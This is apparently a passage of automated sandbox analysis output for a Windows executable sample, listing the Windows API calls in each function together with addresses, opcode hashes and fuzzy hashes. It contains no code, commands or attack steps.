                        • String ID: %s%d
                        • API String ID: 1272988791-1110647743
                        • Opcode ID: 1efef1108ad99c1266843477fb6af030a07806a0814f7486ebf88eb022c237d3
                        • Instruction ID: 6958de6f944338a4520055cae016ae33d1812f8e34d12d2848f94d8d7fdbd6e5
                        • Opcode Fuzzy Hash: 1efef1108ad99c1266843477fb6af030a07806a0814f7486ebf88eb022c237d3
                        • Instruction Fuzzy Hash: BE11A2756002456BCF15BF75DC89FEE376EAFD4314F048075BA099B292DE309E458B60
                        APIs
                        • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00A158C1
                        • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00A158EE
                        • DrawMenuBar.USER32(?), ref: 00A158FD
                        Strings
                        Similarity
                        • API ID: Menu$InfoItem$Draw
                        • String ID: 0
                        • API String ID: 3227129158-4108050209
                        • Opcode ID: 700bbd53b5a45fef3ee98f8aeef3775029977f6ba9c773c62fd928477661ce8c
                        • Instruction ID: 2439c447083dd9a75b77827958fb9a03f93385a5b70262b4f01f8f9d9c989f08
                        • Opcode Fuzzy Hash: 700bbd53b5a45fef3ee98f8aeef3775029977f6ba9c773c62fd928477661ce8c
                        • Instruction Fuzzy Hash: F0016D35900218EFDB219FA5DC44BEEBBB9FB85360F10C099E849D6151DB308AC4DF21
                        APIs
                        • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 009DD3BF
                        • FreeLibrary.KERNEL32 ref: 009DD3E5
                        Strings
                        Similarity
                        • API ID: AddressFreeLibraryProc
                        • String ID: GetSystemWow64DirectoryW$X64
                        • API String ID: 3013587201-2590602151
                        • Opcode ID: e34f5901813f14b4e72b702f297a8fad3b946990dbf415c1fc1fd374d6bd2703
                        • Instruction ID: 8bd7f3ba0bf4db69f9d166ee9b4907921b775124a107134f65b1c091590e3e6b
                        • Opcode Fuzzy Hash: e34f5901813f14b4e72b702f297a8fad3b946990dbf415c1fc1fd374d6bd2703
                        • Instruction Fuzzy Hash: 4EF055344C3610EBD7308A188C48DADB338BF00B11B64CA4BF126F6294E734CC84CB42
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 88e97fa0fab8b9460e25b362d0d4b6681f18563f72bb54c3470620b435eba6f1
                        • Instruction ID: d5a2ccddce0066ebf3b0f1e6687a21479abba3774c2a5201ef408edb15beacec
                        • Opcode Fuzzy Hash: 88e97fa0fab8b9460e25b362d0d4b6681f18563f72bb54c3470620b435eba6f1
                        • Instruction Fuzzy Hash: B1C16C75A0024AEFCB15CFA5C894BAEB7B9FF88304F208598E515EB251D771ED81CB90
                        APIs
                        Similarity
                        • API ID: __alldvrm$_strrchr
                        • String ID:
                        • API String ID: 1036877536-0
                        • Opcode ID: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                        • Instruction ID: e248748538cebb7931629ca3b73a7081fcae61f609b08af9f11bc8e88ac28dca
                        • Opcode Fuzzy Hash: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                        • Instruction Fuzzy Hash: 52A15971D043869FEB11DF18CA917FEBBE9EF62360F14816DE5859B282C2388D41D751
                        APIs
                        Similarity
                        • API ID: Variant$ClearInitInitializeUninitialize
                        • String ID:
                        • API String ID: 1998397398-0
                        • Opcode ID: 007c485ed8f991b71bfec4f45825a3fb71da401821d9f25454591453fa4087f8
                        • Instruction ID: a9bed9e432dcf7d10fea4e081677c9748d6e40e9db41a091b2efaaa1d7bf5c1b
                        • Opcode Fuzzy Hash: 007c485ed8f991b71bfec4f45825a3fb71da401821d9f25454591453fa4087f8
                        • Instruction Fuzzy Hash: D5A14D766043049FCB00EF68D585A2AB7E9FF88714F14885DF99A9B3A2DB31ED01CB51
                        APIs
                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00A1FC08,?), ref: 009E05F0
                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00A1FC08,?), ref: 009E0608
                        • CLSIDFromProgID.OLE32(?,?,00000000,00A1CC40,000000FF,?,00000000,00000800,00000000,?,00A1FC08,?), ref: 009E062D
                        • _memcmp.LIBVCRUNTIME ref: 009E064E
                        Similarity
                        • API ID: FromProg$FreeTask_memcmp
                        • String ID:
                        • API String ID: 314563124-0
                        • Opcode ID: 9a083f149c432dc86124c6d39bd9cffa8957e776ee35f36999018b7428b834ff
                        • Instruction ID: 212c721a9a93d77edfcfd1f700471f8a677176b9707b80f7071bcb32659975a6
                        • Opcode Fuzzy Hash: 9a083f149c432dc86124c6d39bd9cffa8957e776ee35f36999018b7428b834ff
                        • Instruction Fuzzy Hash: 2F811771A00209EFCB05DF95C984EEEB7B9FF89315F204598F506AB250DB71AE46CB60
                        APIs
                        Similarity
                        • API ID: _free
                        • String ID:
                        • API String ID: 269201875-0
                        • Opcode ID: 9e0183e7649a3b8ba97ed154b2980affbd17f4a23f68b016c7d2be61e9033dec
                        • Instruction ID: 384267337d161fd93fa02441f863d4d03665561ad89a1185ef751fc5008f7396
                        • Opcode Fuzzy Hash: 9e0183e7649a3b8ba97ed154b2980affbd17f4a23f68b016c7d2be61e9033dec
                        • Instruction Fuzzy Hash: 94413E31D00510ABDB297BF98C45FFE3AA9EF83370F14462DF819D62A3E634484156A7
                        APIs
                        • GetWindowRect.USER32(0136E908,?), ref: 00A162E2
                        • ScreenToClient.USER32(?,?), ref: 00A16315
                        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00A16382
                        Similarity
                        • API ID: Window$ClientMoveRectScreen
                        • String ID:
                        • API String ID: 3880355969-0
                        • Opcode ID: 508bd5b62da4d348c702fef18b27670bb949a92454080fcf97f1c70c7e191970
                        • Instruction ID: 49e63783771f26990e8c3ed65871c2205372f5d74ecec89f57505de3308f608d
                        • Opcode Fuzzy Hash: 508bd5b62da4d348c702fef18b27670bb949a92454080fcf97f1c70c7e191970
                        • Instruction Fuzzy Hash: 7651F974A00209EFDB10DF68D981AEE7BB6FB45360F108169F965DB2A0D770ED81CB50
                        APIs
                        • socket.WSOCK32(00000002,00000002,00000011), ref: 00A01AFD
                        • WSAGetLastError.WSOCK32 ref: 00A01B0B
                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00A01B8A
                        • WSAGetLastError.WSOCK32 ref: 00A01B94
                        Similarity
                        • API ID: ErrorLast$socket
                        • String ID:
                        • API String ID: 1881357543-0
                        • Opcode ID: b167f80638d4834c1ae9f55239b9734ab51a8ee60ff6319a73c1d066a161415f
                        • Instruction ID: bcb4029441fb70644131dbea6c08279850db8b2f347029dfe6eafe5186767d51
                        • Opcode Fuzzy Hash: b167f80638d4834c1ae9f55239b9734ab51a8ee60ff6319a73c1d066a161415f
                        • Instruction Fuzzy Hash: 7041C474640200AFE720AF24D886F6577E5AF85718F54C448FA1A9F7D2E772DD42CB90
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 78420e15445c8599d7c52c055b46ecae91615ca223f1a1404bb6dcbb6e562829
                        • Instruction ID: ae40fa690e73edba48edabd81efcb54dfc3a0617675f4fc468893ea111d2adbc
                        • Opcode Fuzzy Hash: 78420e15445c8599d7c52c055b46ecae91615ca223f1a1404bb6dcbb6e562829
                        • Instruction Fuzzy Hash: 54413871A00704AFD7249F78CD41BAABBA9EBC9720F10452EF556DB2D2D7B199008780
                        APIs
                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 009F5783
                        • GetLastError.KERNEL32(?,00000000), ref: 009F57A9
                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 009F57CE
                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 009F57FA
                        Similarity
                        • API ID: CreateHardLink$DeleteErrorFileLast
                        • String ID:
                        • API String ID: 3321077145-0
                        • Opcode ID: a480ebee3385cb797b14305e0219bfdf15b86cf6525247f4cae2963772254e29
                        • Instruction ID: 1c9eca90d37a10d8b8e4b940e8f1e6b0e3f3ce3e355a34e5b81ff419d13eacbd
                        • Opcode Fuzzy Hash: a480ebee3385cb797b14305e0219bfdf15b86cf6525247f4cae2963772254e29
                        • Instruction Fuzzy Hash: 1D412939600610DFCB11EF55C444A5EBBE6AF89720B19C488F95AAB362CB34FD41CB91
                        APIs
                        • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,009A6D71,00000000,00000000,009A82D9,?,009A82D9,?,00000001,009A6D71,8BE85006,00000001,009A82D9,009A82D9), ref: 009BD910
                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 009BD999
                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 009BD9AB
                        • __freea.LIBCMT ref: 009BD9B4
                          • Part of subcall function 009B3820: RtlAllocateHeap.NTDLL(00000000,?,00A51444,?,0099FDF5,?,?,0098A976,00000010,00A51440,009813FC,?,009813C6,?,00981129), ref: 009B3852
                        Similarity
                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                        • String ID:
                        • API String ID: 2652629310-0
                        • Opcode ID: 01adaee579ebebe6b8bf4dd47e4dad97404d95bb489d3452837c7b80edf0a83a
                        • Instruction ID: baff225efbda4ad63ec59b34815cff5a7d3f3f7419d928086635660e4acb2e82
                        • Opcode Fuzzy Hash: 01adaee579ebebe6b8bf4dd47e4dad97404d95bb489d3452837c7b80edf0a83a
                        • Instruction Fuzzy Hash: 0631C172A0221AABDF24DFA5DD45EEE7BA9EB81720F054168FC04D7150EB35CD51CB90
                        APIs
                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00A15352
                        • GetWindowLongW.USER32(?,000000F0), ref: 00A15375
                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00A15382
                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00A153A8
                        Similarity
                        • API ID: LongWindow$InvalidateMessageRectSend
                        • String ID:
                        • API String ID: 3340791633-0
                        • Opcode ID: 3bdedbc40e38eed23abe4e75f26fe4f6e1a90b07e3bf3eafecd9bcd8e7df57bb
                        • Instruction ID: a5b239070de5e836280c2e06e9b002664120c52c7e9c3c938c742bc1cf364214
                        • Opcode Fuzzy Hash: 3bdedbc40e38eed23abe4e75f26fe4f6e1a90b07e3bf3eafecd9bcd8e7df57bb
                        • Instruction Fuzzy Hash: 2B31C434E55A08EFEB349F74CC25BE83766AB85390F584102FA309B1E1C7B49DC0AB41
                        APIs
                        • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 009EABF1
                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 009EAC0D
                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 009EAC74
                        • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 009EACC6
                        Similarity
                        • API ID: KeyboardState$InputMessagePostSend
                        • String ID:
                        • API String ID: 432972143-0
                        • Opcode ID: 9fb91712908d187e4941020c8d6b1320088751aa588f7d66184e338fb3cddd53
                        • Instruction ID: 30b06061448a5289111ac2ada1ad6a57d80831c35795f1fba121fdf2004f4753
                        • Opcode Fuzzy Hash: 9fb91712908d187e4941020c8d6b1320088751aa588f7d66184e338fb3cddd53
                        • Instruction Fuzzy Hash: D6313B30A403986FEF36CB668C047FE7BA9AB85320F28471AE4D5521F1C378AD858753
                        APIs
                        • ClientToScreen.USER32(?,?), ref: 00A1769A
                        • GetWindowRect.USER32(?,?), ref: 00A17710
                        • PtInRect.USER32(?,?,00A18B89), ref: 00A17720
                        • MessageBeep.USER32(00000000), ref: 00A1778C
                        Similarity
                        • API ID: Rect$BeepClientMessageScreenWindow
                        • String ID:
                        • API String ID: 1352109105-0
                        • Opcode ID: ad95808c4bacb3a855a0f50776d52cae3c949cefc372cbe8ba2de67b98dfad6e
                        • Instruction ID: 98a6cf134fe269b2e1177bcaa5fa3e0b5d162c4014fdd4be3870b6a29253fdd6
                        • Opcode Fuzzy Hash: ad95808c4bacb3a855a0f50776d52cae3c949cefc372cbe8ba2de67b98dfad6e
                        • Instruction Fuzzy Hash: 5A416D74A05214DFCB11CF98C894EEDB7F5FB49315F1591A8E4249B2A1C730E982CF90
                        APIs
                        • GetForegroundWindow.USER32 ref: 00A116EB
                          • Part of subcall function 009E3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 009E3A57
                          • Part of subcall function 009E3A3D: GetCurrentThreadId.KERNEL32 ref: 009E3A5E
                          • Part of subcall function 009E3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009E25B3), ref: 009E3A65
                        • GetCaretPos.USER32(?), ref: 00A116FF
                        • ClientToScreen.USER32(00000000,?), ref: 00A1174C
                        • GetForegroundWindow.USER32 ref: 00A11752
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                        • String ID:
                        • API String ID: 2759813231-0
                        • Opcode ID: 701271d0bf65717374d92ecb99c2ca433bbad2f1bfdc6ae562711609a7cb05ce
                        • Instruction ID: 56a27844342be0f294674723073164dccae35a6460ec15f6d60a2e839de0f26d
                        • Opcode Fuzzy Hash: 701271d0bf65717374d92ecb99c2ca433bbad2f1bfdc6ae562711609a7cb05ce
                        • Instruction Fuzzy Hash: 99313E71D00149AFDB00EFA9C885DEEBBF9EF88304B5080AAE515E7352D631DE45CBA1
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32 ref: 009ED501
                        • Process32FirstW.KERNEL32(00000000,?), ref: 009ED50F
                        • Process32NextW.KERNEL32(00000000,?), ref: 009ED52F
                        • CloseHandle.KERNEL32(00000000), ref: 009ED5DC
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                        • String ID:
                        • API String ID: 420147892-0
                        • Opcode ID: 238ce7125f1f3aafe8e5f7a10c4e86194ca5488e1831894180a16bd19c576827
                        • Instruction ID: 80a62aa46aaf1f652f66445ad0b3c266acbf759f363d77c0a4708dd47c8e1718
                        • Opcode Fuzzy Hash: 238ce7125f1f3aafe8e5f7a10c4e86194ca5488e1831894180a16bd19c576827
                        • Instruction Fuzzy Hash: 1831AD71008340AFD301EF94C885BBFBBE8EFD9354F14092DF581862A1EB719A49CB92
                        APIs
                          • Part of subcall function 00999BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00999BB2
                        • GetCursorPos.USER32(?), ref: 00A19001
                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,009D7711,?,?,?,?,?), ref: 00A19016
                        • GetCursorPos.USER32(?), ref: 00A1905E
                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,009D7711,?,?,?), ref: 00A19094
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                        • String ID:
                        • API String ID: 2864067406-0
                        • Opcode ID: 8cd5f7ea6bd16e263b7901033580346604bf38e4e7cb96c35120ca931b29ee98
                        • Instruction ID: 47df6954838f89f23c6b295b717f04fc7a202d7093df092a66edbcb27518be9e
                        • Opcode Fuzzy Hash: 8cd5f7ea6bd16e263b7901033580346604bf38e4e7cb96c35120ca931b29ee98
                        • Instruction Fuzzy Hash: 67217C35600128EFCB25CF98C868FFB7BBAEB89361F044069F90547261C3359D91DB61
                        APIs
                        • GetFileAttributesW.KERNEL32(?,00A1CB68), ref: 009ED2FB
                        • GetLastError.KERNEL32 ref: 009ED30A
                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 009ED319
                        • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00A1CB68), ref: 009ED376
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CreateDirectory$AttributesErrorFileLast
                        • String ID:
                        • API String ID: 2267087916-0
                        • Opcode ID: 450494d2772b84023eaf6d98c6027f042b35508169304e0725d94acef41cf869
                        • Instruction ID: 5ff8bcc32dc4bf1c10b3387dcf50f28f7558307db83f4c1ab751133e1946e322
                        • Opcode Fuzzy Hash: 450494d2772b84023eaf6d98c6027f042b35508169304e0725d94acef41cf869
                        • Instruction Fuzzy Hash: 8D21B17450A2019FC300EF25C8818AEB7E8AF9A368F105A1DF499C72E1E730DD46CB93
                        APIs
                          • Part of subcall function 009E1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 009E102A
                          • Part of subcall function 009E1014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 009E1036
                          • Part of subcall function 009E1014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009E1045
                          • Part of subcall function 009E1014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 009E104C
                          • Part of subcall function 009E1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009E1062
                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 009E15BE
                        • _memcmp.LIBVCRUNTIME ref: 009E15E1
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009E1617
                        • HeapFree.KERNEL32(00000000), ref: 009E161E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                        • String ID:
                        • API String ID: 1592001646-0
                        • Opcode ID: 849e8511ea97bf1fa43b9259eed6bb064c82e2f9f17adc2464a949754ff63c75
                        • Instruction ID: e37cacba53d03b9c2bac789893ef5ec1365bfd653d11994383d91cd3b203f485
                        • Opcode Fuzzy Hash: 849e8511ea97bf1fa43b9259eed6bb064c82e2f9f17adc2464a949754ff63c75
                        • Instruction Fuzzy Hash: 9E21AC31E40209EFDF05DFA6C945BEEB7B8EF84354F088459E445AB241EB30AE05CBA0
                        APIs
                        • GetWindowLongW.USER32(?,000000EC), ref: 00A1280A
                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00A12824
                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00A12832
                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00A12840
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Window$Long$AttributesLayered
                        • String ID:
                        • API String ID: 2169480361-0
                        • Opcode ID: 473e7940905b01acc26a9224f963632761fce74538b22835c6a654286d700c2b
                        • Instruction ID: a9a56803b3d78c4a33d9a96f3a1725dfbaed56a6d211085a67a556483035e3b9
                        • Opcode Fuzzy Hash: 473e7940905b01acc26a9224f963632761fce74538b22835c6a654286d700c2b
                        • Instruction Fuzzy Hash: 5F21B035244511AFE714DB24C845FEA7BAAAF85324F148158F4268B6E2CB71FC92CBD0
                        APIs
                          • Part of subcall function 009E8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,009E790A,?,000000FF,?,009E8754,00000000,?,0000001C,?,?), ref: 009E8D8C
                          • Part of subcall function 009E8D7D: lstrcpyW.KERNEL32(00000000,?), ref: 009E8DB2
                          • Part of subcall function 009E8D7D: lstrcmpiW.KERNEL32(00000000,?,009E790A,?,000000FF,?,009E8754,00000000,?,0000001C,?,?), ref: 009E8DE3
                        • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,009E8754,00000000,?,0000001C,?,?,00000000), ref: 009E7923
                        • lstrcpyW.KERNEL32(00000000,?), ref: 009E7949
                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,009E8754,00000000,?,0000001C,?,?,00000000), ref: 009E7984
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: lstrcmpilstrcpylstrlen
                        • String ID: cdecl
                        • API String ID: 4031866154-3896280584
                        • Opcode ID: 0ddd84d99e137f1704aa9f47bc0ab5e295aded36be3ea9d205054c4cc190b153
                        • Instruction ID: cfd39c45fe6bdc7000232f299f2376ad23ff27c306c7aa5095dac41c0207cf56
                        • Opcode Fuzzy Hash: 0ddd84d99e137f1704aa9f47bc0ab5e295aded36be3ea9d205054c4cc190b153
                        • Instruction Fuzzy Hash: 2011E93A200381ABCB169FB9DC45E7BB7A9FF85350B50802AF946C72A5EB319C11C752
                        APIs
                        • GetWindowLongW.USER32(?,000000F0), ref: 00A17D0B
                        • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00A17D2A
                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00A17D42
                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,009FB7AD,00000000), ref: 00A17D6B
                          • Part of subcall function 00999BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00999BB2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Window$Long
                        • String ID:
                        • API String ID: 847901565-0
                        • Opcode ID: a265ecbf19d75d170229ce29caa016894ae49910957629b86edfa28a65b73aee
                        • Instruction ID: 9806152d2e6c5495448c874b449d512e3679152ce8171c90d0a3183b966752a1
                        • Opcode Fuzzy Hash: a265ecbf19d75d170229ce29caa016894ae49910957629b86edfa28a65b73aee
                        • Instruction Fuzzy Hash: 18118C31645619AFCB109F68DC04ABA3BB5BF45375B159724F839C72E0D7309991CB90
                        APIs
                        • SendMessageW.USER32(?,00001060,?,00000004), ref: 00A156BB
                        • _wcslen.LIBCMT ref: 00A156CD
                        • _wcslen.LIBCMT ref: 00A156D8
                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00A15816
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessageSend_wcslen
                        • String ID:
                        • API String ID: 455545452-0
                        • Opcode ID: 5ecaaf5ee138d23bcaaef3967b3d2861a7a00e7d6c9e8f37944fee612e49ffbd
                        • Instruction ID: 5f8ca1f545829b3da26dd4dbcafe609526cbe4beb5fa2f933199f1d35aa057ac
                        • Opcode Fuzzy Hash: 5ecaaf5ee138d23bcaaef3967b3d2861a7a00e7d6c9e8f37944fee612e49ffbd
                        • Instruction Fuzzy Hash: CF11B471E00604DADF20DFB5CC85AEE777CAF95764B108026F915D6081E77489C4CBA0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 775968df65c5cc5b038ec408aac648ddf38c2188eda5e7f41a6c5f1c98520a1e
                        • Instruction ID: 3838314a6ae8aadb1db9e5d47f2256a6db90615c5fcb3b80f445f6e5106e9778
